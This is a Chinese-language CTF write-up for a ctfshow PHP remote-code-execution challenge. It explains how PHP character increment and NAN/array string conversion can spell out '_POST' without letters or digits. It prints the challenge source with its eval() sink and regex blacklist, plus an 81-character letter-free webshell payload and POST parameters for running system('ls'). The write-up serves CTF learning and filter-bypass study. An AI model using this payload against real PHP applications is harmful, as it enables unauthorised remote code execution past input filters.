字符自增型无字母rce

本文讲解如何用php数组无数字字母(除0外)，自增获取webshell。其实真正无字母数字的是rce2，我这里还能用0.
例题是ctfshow RCE极限挑战4.
原理：php是弱语言，单字符型变量自增能得到下一个字符，如

$a='A';
$a++;  // 此时$a为B

而数组转字符串后是天然的字符串 Array，我们切片取A，通过自增便可得到任意一个大写字母。
还有1/_==INF，下划线也可快速构造NAN，如

$a=_/_._;   // NAN_

如此，有'N'==$a[0]
N 跟 O 很近，构造 _POST，通过二次引用即 $_POST0; 可执行任意php代码。
注意$a++; ++$a;的区别，建议先加再用。
能用的短变量有$_ 、$__ 、$_0 三个.后面才知道还能用不可见字符替换php变量名称$%ff，这样就更短了。
题目

<?php
//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势，太棒啦~。
error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow) && strlen($ctfshow) <= 84) {
        if (!preg_match("/[a-zA-Z1-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("Are you hacking me AGAIN?");
        }
    }else{
        phpinfo();
    }
}

我的解法81位

<?php 
$a=(_/_._)[0];// NAN 取 N
$aa=++$a;// O
$a0=++$a.$aa;// PO
++$a/++$a;
$a=_.$a0.=++$a.++$a;// _.POST
$$a[0]($$a[_]);
//var_dump($a);

去掉注释，php开头，替换a为下划线得

$_=(_/_._)[0];$__=++$_;$_0=++$_.$__;++$_/++$_;$_=_.$_0.=++$_.++$_;$$_[0]($$_[_]);

接下来url编码，post传ctf_show=xxxxx&0=system&_=ls，搞定！

ps: url编码的三种方法
1.python 的from urllib import quote
2.php的 echo urlencode
3.burp suite 的decode 标签
最短rce5长度72，以后通杀无字母数字！

参考
ctfshow rce挑战wp https://ctf-show.feishu.cn/docx/ToiJd70SboRn52xhn3WcJsfjnah
一些不包含数字和字母的webshell https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html